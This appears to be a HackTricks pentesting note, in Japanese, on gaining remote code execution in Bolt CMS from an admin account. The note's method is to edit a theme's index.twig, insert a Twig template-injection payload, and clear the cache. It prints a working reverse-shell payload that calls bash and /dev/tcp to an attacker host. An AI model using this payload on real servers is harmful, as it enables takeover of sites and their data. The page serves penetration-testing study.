hacktricks/src/network-services-pentesting/pentesting-web/bolt-cms.md

Bolt CMS

{{#include ../../banners/hacktricks-training.md}}

RCE

管理者としてログインした後（/botに移動してログインプロンプトにアクセス）、Bolt CMSでRCEを取得できます：

• Configuration -> View Configuration -> Main Configurationを選択するか、URLパス/bolt/file-edit/config?file=/bolt/config.yamlに移動します。
• テーマの値を確認します。

• File management -> View & edit templatesを選択します。
• 前のステップで見つけたテーマベース（この場合はbase-2021）を選択し、index.twigを選択します。
• 私の場合、これはURLパス/bolt/file-edit/themes?file=/base-2021/index.twigにあります。
• template injection (Twig)を介してこのファイルにペイロードを設定します。例：{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
• 変更を保存します。

• Maintenance -> Clear the cacheでキャッシュをクリアします。
• 再度、通常のユーザーとしてページにアクセスすると、ペイロードが実行されるはずです。

{{#include ../../banners/hacktricks-training.md}}